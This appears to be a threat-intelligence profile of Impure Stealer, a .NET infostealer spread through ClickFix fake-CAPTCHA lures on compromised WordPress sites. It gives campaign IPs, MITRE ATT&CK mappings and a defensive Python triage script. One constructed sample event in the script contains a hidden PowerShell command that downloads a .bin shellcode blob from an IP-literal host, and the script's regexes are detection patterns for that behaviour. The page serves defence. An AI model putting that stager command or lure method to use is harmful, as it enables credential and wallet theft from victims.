
Impure Stealer

Impure Stealer is a .NET information-stealing malware family identified by Rapid7 during a large ClickFix campaign that used compromised WordPress websites to target primarily Windows systems. In the observed activity, attackers injected malicious JavaScript into legitimate WordPress sites and displayed fake Cloudflare verification or CAPTCHA prompts that instructed victims to copy and paste commands into the Windows Run dialog, resulting in manual execution of a multi-stage, largely in-memory infection chain. Rapid7 reported the broader operation had been active since at least December 2025, with some supporting infrastructure dating to July/August 2025, and involved more than 250 compromised websites across at least 12 countries.

Rapid7 described Impure Stealer as a previously unnamed .NET infostealer and noted that, in one infection chain, it replaced Vidar as the final payload: a second shellcode blob contained an encrypted .NET stealer that researchers named Impure Stealer. The campaign also delivered Vidar Stealer, VodkaStealer, and the DoubleDonut loader. The payloads delivered in this campaign, Impure Stealer among them, were reported to harvest browser credentials, authentication cookies, cryptocurrency wallet data, and other sensitive information from infected devices. Rapid7 also characterized the overall campaign goal as theft and exfiltration of credentials and digital wallets.

High-confidence infrastructure and behavioral details tied to the campaign include PowerShell stagers retrieving content from 91.92.240[.]219 and 178.16.53[.]70, downloading shellcode such as cptch.bin and cptchbuild.bin from 94.154.35[.]115, and injecting payloads into svchost.exe. Rapid7 reported that final payload hosting later moved to 172.94.9[.]187 in early March 2026. The campaign used heavily obfuscated JavaScript, anti-analysis checks, localized fake CAPTCHA lures in at least 31 languages, and Donut-based shellcode loaders in a two-stage sequence dubbed DoubleDonut. No specific threat actor attribution for Impure Stealer itself was provided in the source reporting.
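The chain described above leaves a recognizable process-creation footprint: a command pasted into the Run dialog starts PowerShell as a child of explorer.exe, and that PowerShell pulls a stager or a .bin shellcode blob from an IP-literal host. The following triage logic, written for this page as an added example (it is not Rapid7's or Mallory's code), scores constructed process-creation events against that pattern; the hostnames, paths and the 198.51.100.10 address in the sample events are constructed, not indicators from the campaign.

```python
"""Heuristic triage of process-creation events for the ClickFix chain described above.
Constructed sample events; hypothetical field names (parent_image, image, command_line)."""
import re
from dataclasses import dataclass

# A command typed into the Run dialog runs as a child of the user's Explorer shell.
RUN_DIALOG_PARENT = "explorer.exe"
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
# Download primitive named in the reporting (Invoke-WebRequest) plus common aliases.
DOWNLOAD_RE = re.compile(r"\b(invoke-webrequest|iwr|irm|invoke-restmethod|downloadstring|downloaddata)\b", re.I)
# Stagers in this campaign fetched from bare IP addresses rather than domains.
IP_URL_RE = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}[/:]", re.I)
HIDDEN_RE = re.compile(r"-(?:w|win|windowstyle)\s+hidden|-nop\b|-enc(?:odedcommand)?\b", re.I)
SHELLCODE_EXT_RE = re.compile(r"\.bin\b", re.I)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def triage(ev: ProcEvent) -> list[str]:
    """Return every ClickFix-style indicator present in one event."""
    reasons = []
    child = ev.image.lower().rsplit("\\", 1)[-1]
    if ev.parent_image.lower().endswith(RUN_DIALOG_PARENT) and child in INTERPRETERS:
        reasons.append("interpreter launched from Explorer (Run dialog pattern)")
    if DOWNLOAD_RE.search(ev.command_line):
        reasons.append("web download cmdlet in command line")
    if IP_URL_RE.search(ev.command_line):
        reasons.append("URL with IP-literal host")
    if HIDDEN_RE.search(ev.command_line):
        reasons.append("hidden/non-interactive PowerShell switches")
    if SHELLCODE_EXT_RE.search(ev.command_line):
        reasons.append("retrieves a .bin blob")
    return reasons


def is_suspicious(ev: ProcEvent, threshold: int = 3) -> bool:
    """Require several indicators together so a lone Explorer-spawned shell does not alert."""
    return len(triage(ev)) >= threshold


# Constructed events: one ClickFix-style stager, one benign Run-dialog shell, one unrelated updater.
CONSTRUCTED_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -w hidden -nop -c "iwr http://198.51.100.10/cptch.bin -OutFile $env:TEMP\a.bin"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -NoExit -Command Get-ChildItem"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Program Files\ExampleApp\updater.exe",
              "updater.exe --check https://updates.example.invalid/manifest.json"),
]


def scan(events: list[ProcEvent]) -> list[int]:
    """Indices of events that cross the alert threshold."""
    return [i for i, ev in enumerate(events) if is_suspicious(ev)]
```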


MITRE ATT&CK

Techniques & procedures

13 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1189 Drive-by Compromise (evidence: 4)

Highly trusted WordPress websites are being compromised as part of an ongoing, widespread campaign designed to inject a ClickFix implant impersonating a Cloudflare human verification challenge.

Execution

2 techniques
T1059 Command and Scripting Interpreter (evidence: 1)

Visitors are instructed to complete the verification by copying and pasting a command into the Windows Run dialog box.

T1204 User Execution (evidence: 3)

Unlike traditional exploit-based attacks, this method relies entirely on user interaction – usually in the form of copying and executing commands.

Credential Access

4 techniques
T1539 Steal Web Session Cookie (evidence: 2)

The payloads delivered include Vidar Stealer, Impure Stealer, VodkaStealer and the DoubleDonut loader - all capable of harvesting browser credentials, authentication cookies, cryptocurrency wallet data and other sensitive information from infected devices.

T1555 Credentials from Password Stores (evidence: 1)

The payloads delivered include Vidar Stealer, Impure Stealer, VodkaStealer and the DoubleDonut loader - all capable of harvesting browser credentials, authentication cookies, cryptocurrency wallet data and other sensitive information from infected devices.

T1555.003 Credentials from Web Browsers (evidence: 1)

"...ultimately steals and exfiltrates credentials and digital wallets..."; "...targeting Google Chrome, Microsoft Edge, Brave..."

T1649 Steal or Forge Authentication Certificates (evidence: 1)

The stealer is equipped to harvest a wide range of data from compromised hosts, including exfiltrating credentials, files, keychain databases, and seed phrases from cryptocurrency wallets.

Collection

1 technique
T1005 Data from Local System (evidence: 1)

The stealer is equipped to harvest a wide range of data from compromised hosts, including exfiltrating credentials, files, keychain databases, and seed phrases from cryptocurrency wallets.

Command and Control

4 techniques
T1071.001 Web Protocols (evidence: 1)

"Invoke-WebRequest" to retrieve payloads; "...fetch a script..."; "...download a shellcode blob..."

T1104 Multi-Stage Channels (evidence: 1)

"...multi-stage malware chain..."; "...Donut loader is used twice in sequence..."

T1132.002 Non-Standard Encoding (evidence: 1)

"...custom Type-Length-Value (TLV) data encoding... custom network protocol on top of TCP..."

T1573.001 Symmetric Cryptography (evidence: 1)

"...AES-256-CBC with a server-provided key for encryption of C2 communication..."

Exfiltration

1 technique
T1041 Exfiltration Over C2 Channel (evidence: 1)

"...steals and exfiltrates credentials and digital wallets..." and ATT&CK table listing "T1041 Exfiltration Over C2 Channel"

INDICATORS OF COMPROMISE

IOCs tracked for this family

55 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network (17 tracked): IPs, domains, and DNS infrastructure linked to this family.

Other (38 tracked): other indicator types observed in public reporting.
